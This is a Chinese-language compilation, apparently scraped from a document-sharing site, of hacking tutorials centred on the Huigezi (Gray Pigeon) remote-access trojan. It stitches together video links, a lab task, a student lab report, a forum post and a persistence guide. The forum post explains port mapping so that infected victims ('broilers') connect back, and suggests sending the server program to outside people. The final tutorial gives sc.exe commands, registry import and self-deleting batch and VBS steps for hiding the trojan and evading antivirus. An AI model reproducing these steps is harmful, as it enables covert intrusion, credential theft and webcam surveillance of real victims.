一定要用迅雷下,不然可能下不了 【黑客视频教程-建立超级隐藏帐户】 https://www.doczj.com/doc/d612354193.html,/eschool/esafe2/hideadmin1.wmv https://www.doczj.com/doc/d612354193.html,/eschool/esafe2/hideadmin2.wmv https://www.doczj.com/doc/d612354193.html,/eschool/esafe2/hideadmin3.wmv 【黑客视频教程-简单制作CHM木马】 https://www.doczj.com/doc/d612354193.html,/eschool/esafe2/CHM1.wmv https://www.doczj.com/doc/d612354193.html,/eschool/esafe2/CHM2.wmv 【黑客视频教程-简单破解Access数据库的密码】 https://www.doczj.com/doc/d612354193.html,/eschool/esafe2/Access.wmv 【黑客视频教程-功能超强的BEAST远控木马】 https://www.doczj.com/doc/d612354193.html,/eschool/esafe2/BEAST1.wmv https://www.doczj.com/doc/d612354193.html,/eschool/esafe2/BEAST2.wmv https://www.doczj.com/doc/d612354193.html,/eschool/esafe2/BEAST3.wmv https://www.doczj.com/doc/d612354193.html,/eschool/esafe2/BEAST4.wmv 【黑客视频教程-VMware虚拟机的安装和使用】 https://www.doczj.com/doc/d612354193.html,/eschool/esafe2/VMware1.wmv https://www.doczj.com/doc/d612354193.html,/eschool/esafe2/VMware2.wmv https://www.doczj.com/doc/d612354193.html,/eschool/esafe2/VMware3.wmv 【黑客视频教程-Iris网络嗅探器使用与技巧】 https://www.doczj.com/doc/d612354193.html,/eschool/esafe2/Iris01.wmv
任务名称:灰鸽子木马利用与防护 任务目的与要求: 了解木马病毒对终端主机的安全威胁,以及木马病毒如何对主机进行攻击。本次任务要求学生学习灰鸽子木马远程控制软件的使用,通过实验可以了解木马和计算机病毒的区别,熟悉使用木马进行网络攻击的原理和方法。 实验任务涉及到的相关知识: 任务环境拓扑: 具体步骤: 1.登录windows2003,打开灰鸽子软件。 winxp windows2003
2.灰鸽子木马共有两个应用程序,其中一个是服务器程序,该程序由客户端配置产生,属于木马受控端程序,种木马时,需将该程序放入到受控端的计算机中,然后双击该程序即可;H_client.exe是木马的客户端程序,属于木马的主控端程序。首先点击H_client.exe打开客户端,选择“文件-配置服务器”配置服务器端。点击“生成服务器”即生成了一个服务器端,点击“确定” 3.登录到XP系统。点击“开始”-“运行”,输入“\\192.168.0.46(win2003的IP地址,已在win2003系统下通过ipconfig命令查看为准),可以通过共享查看win2003共享的文件,如图所示,将setup.exe拷贝到XP系统的桌面,然后双击运行。
4.返回win2003,点击“文件”-“增加主机”,输入XP的IP地址192.168.0.43(以在XP下通过ipconfig命令查看到得IP为准),点击确定。 5.双击文件目录浏览下的“我的电脑”,可以查看到主机为192.168.0.43的标识。然后双击192.168.0.43,可以查看到XP系统的目录及文件。此时点击C:\Documents and Settings\Administrator\桌面,可以查看到XP左面上放置的文件setup.exe服务器端。
灰鸽子内网端口映射 2009-08-13 15:49:15| 分类:系统安全|字号订阅 给大家说一下内网端口映射 查看自己是不是内网的方法 开始----运行----CMD 在弹出的窗口里输入IPCONFIG 0 && image.height>0){if(image.width>=700){this.width=700;this.height=image.height*700/image.widt h;}}"> 这就是内网了 192.168.1.107是自己这台机器的IP 192.168.1.1 路由器地址 1.路由器映射 在IE浏览器里输入路由器地址 输入用户名密码进入。一般默认都是ADMIN密码也是ADMIN。 进入点击转发规则---虚拟服务器 端口添8000
IP地址添自己的内网IP 协议TCP 启用是 重启路由器 看看是不是自己的灰鸽子已经上线了,嘿嘿 2.VPORT映射。 打开灰鸽子 点工具--内网端口映射 0 && image.height>0){if(image.width>=700){this.width=700;this.height=image.height*700/image.widt h;}}">
0 && image.height>0){if(image.width>=700){this.width=700;this.height=image.height*700/image.widt h;}}"> 直接生成服务端程序 OK把程序发给外网的人运行 然后回到上图配置 VPORT服务端IP:发给程序那个人的IP 控制端口:默认 连接.成功后点击映射。OK映射成功后关闭。 现在看是不是已经能上线了。呵呵 **********最后说一下有些人的几个误区******************* 就是用啊D来扫9999端口。 有的人说扫到9999端口可以连接,也可以映射,就是为什么不上线 我想可能是你扫到的端口是别人用来映射开的9999端口,他已经把8000端口映射到他的8000端口上了 所以是你上不了线的原因 当你有肉鸡上线的时候,就会自动上线到他的8000端口上而不会到你这里 这就是其中的原因不知道听懂没有
电子信息工程学系实验报告——适用于计算机课程 课程名称:信息安全概论Array实验项目名称:灰鸽子的使用实验时间:2012.4.27 班级:信息安全101 姓名:徐凤姬学号:020708119 一、实验目的: 1、了解灰鸽子是一个集多种控制方法于一体的木马病毒。 2、通过实验了解灰鸽子是一款优秀的远程控制软件。 3、熟悉使用木马进行网络攻击的原理和方法。 二、实验环境: 装有Windows 2000/XP系统的计算机,局域网或Internet,灰鸽子软件(服务器和客户端)。 三、实验原理 功能介绍: (1)对远程计算机文件管理:模枋 Windows 资源管理器,可以对文件进行复制、粘贴、删除,重命名、远程运行等,可以上传下载文件或文件夹,操作简单易用。 (2)远程控制命令:查看远程系统信息、剪切板查看、进程管理、服务管理、共享管理!(3)捕获屏幕:不但可以连继的捕获远程电脑屏幕,还能把本地的鼠标及键盘传动作送到远程实现实时控制功能! (4)视频语音,可以监控远程摄像头,还有语音监听和发送功能,可以和远程主机进行语音对话! (5)telnet(超级终端). (6)注册表模拟器:远程注册表操作就像操作本地注册表一样方便。 (7)命令广播:可以对自动上线主机进行命令广播,如关机、重启、打开网页, 筛选符合条件的机等,点一个按钮就可以让N台机器同时关机或进行其它操作。 (8)服务端以服务方式启动,支持发送多种组合键,可以轻松管理远程服务器。 (9)专用的自动上线系统,直接使用灰鸽子注册ID即可实现远程服务端自动上线。(10)多种自动上线方式:专用上线、DNS解析域名、固定IP等,由用户自由选择。 四、实验内容 熟悉灰鸽子的使用,例如:窃取账号、密码、照片、重要文件,连续捕获远程电脑屏幕,监控被控电脑上的摄像头,或者进行远程控制。 五、实验步骤 1、在做灰鸽子实验前,先关闭杀毒软件和防火墙。 2、安装灰鸽子 (1)将下载的文件解压到某个文件夹,但不要改文件夹的名字。 (2)首先运行 sunray.exe,然后运行 http.exe 点开始服务。 (3)运行客户端,也就是H_Client.exe这个文件,点击“自动上线”选项。 3、远程控制灰鸽子的应用 (1)打开灰鸽子,主页面如下:
灰鸽子远程控制教程 灰鸽子远程控制,著名木马灰鸽子远程控制工具,附带中文版键盘记录,多功能图标修改器等! 准备工具: 鸽子服务端 IcoSprite图标更改器; SC.exe服务添加删除更改工具; winrar 程序特点: 自解压形式,双击即可 制作过程: 1. 首先自己配置一下鸽子服务端,配置时[启动项设置]这里面的都不要填,不要写入注册表,也不要用服务启动。其他的随你个人爱好。 2.用SC创建一个服务 运行CMD.EXE 在system32的目录下运行执行 SC.exe create huigezi BinPath= "%systemroot%\system32\gezi.exe" type=own type= interact start= auto DisplayName= "gezi"
‘这句是用SC建立一个服务,服务名为huigezi,路径Binpath为 "%systemroot%\system32\gezi.exe",类型type为own 与interact交互,启动类型start为自动,显示名DisplayName为"gezi"。 sc.exe descript_ion huigezi "不死鸽子" ‘这句是将huigezi服务的描述改为“不死鸽子” sc config wuauserv depend= huigezi ‘配置huigezi使wuauserv服务依存此服务(wuauserv可以根据自己喜欢改成其它服务,这里的wuauserv是系统在Windows Update网站的自动更新服务)。 这里的目的是迷惑管理员,使其不敢轻易停止我们生成的服务,自己也可以多加点。 3.将这些从注册表导出,我个人经验是:瑞星,咔吧等的注册表监控不会对导入注册表报警. 我们将他命名为1.reg 4.创建一个BAT文件,并命名为update.bat @regedit /s %systemroot%\system32\1.reg @%systemroot%\system32\gezi.exe @del /q /f /s %systemroot%\system32\1.reg @del /q /f /s %systemroot%\system32\Update.vbs @del /q /f /s %systemroot%\system32\Update.bat 5.创建一个vbs并命名为update.vbs 目的是为了作用是令bat里的内容以安静模式执行,这样就可以让cmd窗口跳出来了,增加了不少隐蔽性。